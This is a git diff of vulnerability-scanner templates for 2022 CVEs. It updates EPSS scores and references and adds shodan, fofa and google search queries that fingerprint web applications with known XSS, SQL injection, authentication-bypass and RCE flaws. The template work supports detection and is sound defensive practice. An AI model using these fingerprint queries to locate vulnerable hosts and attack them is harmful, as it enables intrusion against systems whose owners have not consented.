tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 1dc7d0f8b4..b6b020f53c 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42748 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.42811 + epss-score: 0.00111 + epss-percentile: 0.44292 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 0bac3de00d..757812e06d 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -30,6 +30,7 @@ info: vendor: auieo product: candidats shodan-query: http.html:"CandidATS" + fofa-query: body="candidats" tags: cve,cve2022,candidats,xss,auieo http: diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 834b58e037..2928cc45f8 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -13,13 +13,14 @@ info: reference: - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4295 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.40181 + epss-score: 0.0012 + epss-percentile: 0.46205 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +29,8 @@ info: product: show_all_comments framework: wordpress publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + shodan-query: http.html:/wp-content/plugins/show-all-comments-in-one-page + fofa-query: body=/wp-content/plugins/show-all-comments-in-one-page tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty http: diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index e9be075582..85067c7dfd 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43014 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.39871 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 46e174e250..a7e4f8bb52 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43015 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.39871 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 6fa025fbf6..92b353c8fa 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -30,6 +30,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve2022,cve,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index e30ecdfee1..b54cfe9af1 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -27,6 +27,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index 5b1583f4d7..a17b4eb1c0 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -11,13 +11,16 @@ info: reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43018 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43018 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40565 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +28,8 @@ info: vendor: opencats product: opencats shodan-query: title:"OpenCATS" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index d8b5febff5..7a380b5adf 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4305 cwe-id: CWE-269 - epss-score: 0.04963 - epss-percentile: 0.92644 + epss-score: 0.06738 + epss-percentile: 0.9384 cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: login_as_user_or_customer_\(user_switching\) framework: wordpress publicwww-query: /wp-content/plugins/login-as-customer-or-user + shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user + fofa-query: body=/wp-content/plugins/login-as-customer-or-user tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy http: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 0ee7cc148d..cd761c6f9f 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 2d5f2093c6..00c47dfce3 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 13fd099436..c80e682bb4 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 87d4b73096..1298ccca67 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index afbf5927fe..6380bf2f13 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -19,14 +19,16 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43169 cwe-id: CWE-79 - epss-score: 0.003 - epss-percentile: 0.66367 + epss-score: 0.00363 + epss-percentile: 0.72306 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 9944fac2f6..e6e9cba7f6 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -19,14 +19,16 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43170 cwe-id: CWE-79 - epss-score: 0.26563 - epss-percentile: 0.96323 + epss-score: 0.30215 + epss-percentile: 0.9694 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index ca6731f209..c9fc1fb9ef 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -25,6 +25,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 4ee1172954..076660f1da 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -30,6 +30,8 @@ info: product: pdf_generator_for_wordpress framework: wordpress publicwww-query: "/wp-content/plugins/pdf-generator-for-wp" + shodan-query: http.html:/wp-content/plugins/pdf-generator-for-wp + fofa-query: body=/wp-content/plugins/pdf-generator-for-wp tags: cve,cve2022,wpscan,wordpress,wp,wp-plugin,xss,pdf-generator-for-wp,wpswings http: diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index a1ea1170f4..359b193a5a 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -27,6 +27,7 @@ info: vendor: hitachi product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 + fofa-query: icon_hash=1749354953 tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi http: diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 6a3a117619..4f0e01014a 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44290 cwe-id: CWE-89 - epss-score: 0.01336 - epss-percentile: 0.8578 + epss-score: 0.0091 + epss-percentile: 0.82781 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index f56af58d56..765fc77d75 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -14,13 +14,15 @@ info: - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad - https://wordpress.org/plugins/fontsy/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4447 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4447 cwe-id: CWE-89 - epss-score: 0.03134 - epss-percentile: 0.9009 + epss-score: 0.04713 + epss-percentile: 0.92631 cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 0348ce8bc0..0e14af4ba6 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -30,6 +30,8 @@ info: vendor: control-webpanel product: webpanel shodan-query: http.title:"Login | Control WebPanel" + fofa-query: title="login | control webpanel" + google-query: intitle:"login | control webpanel" tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel http: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index a969924eae..50b56671f4 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -29,6 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index c04b5a31c7..6d3f685a3d 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -27,6 +27,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index c7a0067ab7..0f7481cd1c 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -29,6 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 0aed280f8d..87985331b8 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2022-44948 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.38514 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,xss,stored-xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 0360fbb3cf..ef529d9285 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -28,6 +28,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index c6c75dba21..191c90351e 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -28,6 +28,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 6e5a05dfbc..6fefe8f747 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2022-44951 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 1fbf828fb0..f0c9738bde 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -28,6 +28,8 @@ info: max-request: 4 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive http: diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index d6cae7559b..4b9c6a44cd 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-44957 cwe-id: CWE-79 epss-score: 0.00091 - epss-percentile: 0.37842 + epss-percentile: 0.39059 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 1a67257e6a..462c4d2f12 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-45354 - epss-score: 0.00408 - epss-percentile: 0.73349 + epss-score: 0.00492 + epss-percentile: 0.7614 cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: download_monitor framework: wordpress shodan-query: html:"/wp-content/plugins/download-monitor/" + fofa-query: body="/wp-content/plugins/download-monitor/" tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp http: diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index 7918ee902b..62f5c91dc9 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -28,6 +28,8 @@ info: product: stock_ticker framework: wordpress publicwww-query: "/wp-content/plugins/stock-ticker/" + shodan-query: http.html:/wp-content/plugins/stock-ticker/ + fofa-query: body=/wp-content/plugins/stock-ticker/ tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss http: diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 7b9cc20217..a473a14b69 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-45805 cwe-id: CWE-89 epss-score: 0.00486 - epss-percentile: 0.75524 + epss-percentile: 0.76005 cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 3c988bbd4b..3697e93e1b 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-45917 cwe-id: CWE-601 epss-score: 0.00221 - epss-percentile: 0.60222 + epss-percentile: 0.60187 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: ilias product: ilias shodan-query: http.html:"ILIAS" + fofa-query: body="ilias" tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss http: diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 8e3f8ca4de..eb8bab2b14 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-306 - epss-score: 0.00908 - epss-percentile: 0.82406 + epss-score: 0.01085 + epss-percentile: 0.84299 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: kubeview_project product: kubeview shodan-query: http.title:"KubeView" + fofa-query: icon_hash=-379154636 + google-query: intitle:"kubeview" tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project http: diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index ef22ee023e..4ea36a824f 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 - epss-score: 0.02743 - epss-percentile: 0.90317 + epss-score: 0.02229 + epss-percentile: 0.89506 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index 723262ce8d..a5700101bc 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-46073 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.38558 + epss-percentile: 0.39756 cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index d3e88d94ac..e4d0b209bd 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -30,6 +30,8 @@ info: vendor: cacti product: cacti shodan-query: title:"Login to Cacti" + fofa-query: icon_hash="-1797138069" + google-query: intitle:"cacti" tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index ee261a0b05..32c0b9aed8 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -30,6 +30,7 @@ info: vendor: niceforyou product: linear_emerge_e3_access_control_firmware shodan-query: http.html:"Linear eMerge" + fofa-query: body="linear emerge" tags: cve,cve2022,xss,emerge,linear,niceforyou http: diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 142020dcbe..df7855cbc2 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -30,6 +30,7 @@ info: vendor: linuxfoundation product: harbor shodan-query: http.favicon.hash:657337228 + fofa-query: icon_hash=657337228 tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation http: diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 397e6d5a06..2b26609a94 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -12,13 +12,15 @@ info: - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities - https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33 - https://nvd.nist.gov/vuln/detail/CVE-2022-46888 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-46888 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.40602 + epss-score: 0.00143 + epss-percentile: 0.50061 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +28,7 @@ info: vendor: nexusphp product: nexusphp shodan-query: http.favicon.hash:-582931176 + fofa-query: icon_hash=-582931176 tags: cve,cve2022,nexus,php,nexusphp,xss http: diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 1cc5c60c65..899d732f10 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46934 cwe-id: CWE-79 - epss-score: 0.05604 - epss-percentile: 0.92519 + epss-score: 0.01051 + epss-percentile: 0.84009 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index 7e75887974..f27b2580d7 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-47002 cwe-id: CWE-863 epss-score: 0.0395 - epss-percentile: 0.91808 + epss-percentile: 0.91996 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index efd1c30340..b0e61e055a 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-47075 - epss-score: 0.00614 - epss-percentile: 0.76423 + epss-score: 0.014 + epss-percentile: 0.86401 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 79ca1ad0db..8f322aad70 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47615 cwe-id: CWE-434 - epss-score: 0.01111 - epss-percentile: 0.84217 + epss-score: 0.01795 + epss-percentile: 0.88096 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: product: learnpress framework: wordpress publicwww-query: "/wp-content/plugins/learnpress" + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress http: diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 57cb7e14bf..b7cc1fbf5b 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 - https://github.com/top-think/framework/compare/v6.0.13...v6.0.14 - https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47945 cwe-id: CWE-22 - epss-score: 0.03747 - epss-percentile: 0.90906 + epss-score: 0.04137 + epss-percentile: 0.92167 cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +31,7 @@ info: product: thinkphp shodan-query: title:"Thinkphp" fofa-query: header="think_lang" + google-query: intitle:"thinkphp" tags: cve,cve2022,thinkphp,lfi http: diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index d94cd6858d..733f3c9c93 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -29,6 +29,8 @@ info: vendor: zohocorp product: manageengine_access_manager_plus shodan-query: title:"ManageEngine" + fofa-query: title="manageengine" 